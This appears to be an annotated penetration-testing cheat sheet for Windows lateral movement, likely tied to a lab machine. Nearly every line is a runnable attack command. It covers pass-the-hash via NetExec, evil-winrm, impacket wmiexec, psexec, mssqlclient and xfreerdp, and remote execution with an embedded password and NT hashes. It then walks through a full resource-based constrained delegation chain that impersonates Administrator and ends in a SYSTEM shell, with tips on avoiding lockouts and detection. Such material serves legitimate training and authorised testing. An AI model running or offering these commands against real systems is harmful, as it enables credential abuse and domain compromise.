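# WinRS
REM WinRS: run a command on a remote host over WinRM (TCP 5985/5986).
REM The account has to be a local admin or a member of "Remote Management
REM Users" on the target. Omitting -p: makes winrs prompt for the password
REM instead of leaving it in the console history and in the command line
REM that process-creation auditing on the jump host will record.
winrs -r:files04 -u:jen -p:Nexus123! "cmd /c hostname & whoami"

REM PsExec (Sysinternals): interactive (-i) cmd on a remote host.
REM Needs SMB (445) and local admin on the target. It copies PSEXESVC.exe
REM to ADMIN$ and installs it as a service, which is a well-known, noisy
REM footprint (service-install events on the target). Omit -p to be
REM prompted rather than putting the password on the command line.
REM Original transcript, run from the jump host (hostname: client74):
REM   C:\Tools\SysinternalsSuite>hostname
REM   client74
.\PsExec64.exe -i \\WEB04 -u corp\jen -p Nexus123! cmd
REM   PsExec v2.4 - Execute processes remotely
REM   C:\Windows\system32>hostname
REM   FILES04
REM NOTE(review): the remote hostname in the transcript (FILES04) does not
REM match the \\WEB04 target on the PsExec line; one of the two was likely
REM edited. Verify against your own target before reusing.
# winrm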
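# Pass-the-hash over WinRM with NetExec.
# With both -u and -H pointing at files, nxc tries EVERY user against EVERY
# hash; against a real domain that can trip the account-lockout policy. Use
#   nxc winrm resourced.local -u users.txt -H hashes.txt --no-bruteforce --continue-on-success
# to pair users.txt line N with hashes.txt line N and keep going after the
# first valid pair. hashes.txt holds NT hashes (an LM: prefix is optional).
nxc winrm resourced.local -u users.txt -H hashes.txt

# Interactive PowerShell over WinRM (5985) authenticating with the NT hash.
# The account must be a local admin or in Remote Management Users on the
# target. The hash on the command line ends up in shell history; prefix the
# command with a space (HISTCONTROL=ignorespace) if that matters to you.
evil-winrm -i resourced.local -u L.Livingstone -H '19a3a7550ce8c505c2d46b5e39d6f808'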
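# wmiexec
# Semi-interactive shell via WMI/DCOM (TCP 135 plus a dynamic RPC port) with
# pass-the-hash (-hashes LM:NT; leaving the LM half empty is fine). Command
# output is written to a file on the target's ADMIN$ share and read back
# over SMB, so 445 must be reachable as well. Quieter than psexec (no
# service is installed) but the WMI process tree is still commonly alerted on.
# USER@TARGET is a placeholder: the original value on this page was destroyed
# by e-mail-address obfuscation ("[email protected]"); fill in account and host/IP.
impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C425E USER@TARGET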
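# PsExec
# impacket's psexec uploads a randomly named service binary to ADMIN$ and
# starts it as a service, giving a SYSTEM shell. Needs SMB (445) and local
# admin on the target and is noisy (new-service events). Same PtH syntax as
# the other impacket tools: -hashes LM:NT with LM left empty.
# USER@TARGET is a placeholder: the original value on this page was destroyed
# by e-mail-address obfuscation ("[email protected]"); fill in account and host/IP.
impacket-psexec USER@TARGET -hashes :e728ecbadfb02f51ce8eed753f3ff3fd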
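# smb
# Pass-the-hash against SMB and list the shares the account can reach.
# Without -d, nxc takes the domain from the target; add --local-auth when
# "user" is a local (non-domain) account, otherwise the logon fails even
# with the right hash. A "(Pwn3d!)" marker in the output means the hash also
# gives local admin on 10.10.14.14 (ADMIN$ is writable).
nxc smb 10.10.14.14 -u user -H :e728ecbadfb02f51ce8eed753f3ff3fd --shares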
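# xfreerdp
# RDP pass-the-hash. /pth: only works when the target has Restricted Admin
# mode enabled (HKLM\SYSTEM\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin = 0);
# otherwise the logon is refused with an account-restriction error and a
# plaintext password is needed. An empty /d: means a local account; set it to
# the domain for domain users.
xfreerdp /v:10.10.14.14 /u:user /d: /pth:e728ecbadfb02f51ce8eed753f3ff3fd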
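# mssql
# Pass-the-hash against MSSQL using Windows (NTLM) authentication rather than
# a SQL login. USER@TARGET is a placeholder: the original value on this page
# was destroyed by e-mail-address obfuscation ("[email protected]"); given the
# neighbouring commands it was probably user@10.10.14.14, but confirm.
impacket-mssqlclient -windows-auth -hashes :e728ecbadfb02f51ce8eed753f3ff3fd USER@TARGET
# Add new computer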
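# Create a machine account (first step of the RBCD chain below). Requires
# ms-DS-MachineAccountQuota > 0 on the domain (default 10) or explicit
# create-child rights on the Computers container. The trailing '$' is added
# to the name automatically if omitted. The original page broke "-hashes"
# across two lines; it is one option.
# On a real engagement use a strong random -computer-pass and remove the
# account when done (recent impacket: impacket-addcomputer ... -delete);
# it is a persistent, attributable artefact otherwise.
impacket-addcomputer resourced.local/l.livingstone -dc-ip 192.168.179.175 -hashes :19a3a7550ce8c505c2d46b5e39d6f808 -computer-name 'qais' -computer-pass 'qais'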
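# https://github.com/tothi/rbcd-attack/blob/master/rbcd.py
# Write msDS-AllowedToActOnBehalfOfOtherIdentity on the target computer object
# (-t RESOURCEDC) so the fake machine account (-f qais) is allowed to delegate
# to it. This only succeeds if the authenticating principal has write access
# to RESOURCEDC's computer object (GenericAll/GenericWrite/WriteDacl...);
# the page implies l.livingstone has that, verify with BloodHound/ACL dump.
# The backslash is doubled because an unquoted "\l" is collapsed to "l" by
# the shell; "-hashes" was split over two lines on the original page.
# Current impacket ships the same capability without a third-party script:
#   impacket-rbcd -delegate-to 'RESOURCEDC$' -delegate-from 'qais$' -action write -dc-ip 192.168.179.175 -hashes :<NT> 'resourced/l.livingstone'
python3 rbcd.py -dc-ip 192.168.179.175 -t RESOURCEDC -f 'qais' -hashes :19a3a7550ce8c505c2d46b5e39d6f808 resourced\\l.livingstone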
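# Obtain a service ticket for the Administrator using SPN (Service Principal Name)
# S4U2Self + S4U2Proxy: authenticate as the fake machine account qais$ and ask
# the KDC for a CIFS ticket to the DC that is valid for Administrator.
# "\$" stops the shell from reading "$:" as a variable; "-impersonate
# Administrator" was split over two lines on the original page and is one option.
# This fails if Administrator is in Protected Users or flagged "account is
# sensitive and cannot be delegated". Kerberos also needs your clock within
# ~5 minutes of the DC (KRB_AP_ERR_SKEW otherwise) and the SPN host resolvable.
# Read the filename getST prints after "Saving ticket in": newer versions
# write Administrator@cifs_resourcedc.resourced.local@RESOURCED.LOCAL.ccache
# rather than Administrator.ccache.
impacket-getST -spn cifs/resourcedc.resourced.local resourced/qais\$:'qais' -impersonate Administrator -dc-ip 192.168.179.175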
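# Set the Kerberos credential cache as an environment variable
# Point Kerberos-aware clients (impacket -k, smbclient -k, ...) at the ticket
# cache written by impacket-getST. Use an absolute path: a relative
# KRB5CCNAME is resolved against the current directory at use time, so the
# cache silently stops being found after a cd.
# NOTE(review): recent impacket versions name the file
#   Administrator@cifs_resourcedc.resourced.local@RESOURCED.LOCAL.ccache
# -- use whatever filename getST printed after "Saving ticket in".
export KRB5CCNAME="$PWD/Administrator.ccache"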
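# Connect using psexec with Kerberos auth
# -k uses the service ticket in $KRB5CCNAME; -no-pass stops impacket from
# prompting for a password. The target MUST be the FQDN that matches the SPN
# in the ticket (cifs/resourcedc.resourced.local), not the IP, and it must
# resolve -- add it to /etc/hosts if there is no DNS, or pass
# -target-ip 192.168.179.175 alongside the name. KRB_AP_ERR_SKEW means the
# clock is out of sync with the DC; "KDC_ERR_S_PRINCIPAL_UNKNOWN" usually means
# the name/SPN mismatch described above.
impacket-psexec -k -no-pass resourcedc.resourced.local -dc-ip 192.168.179.175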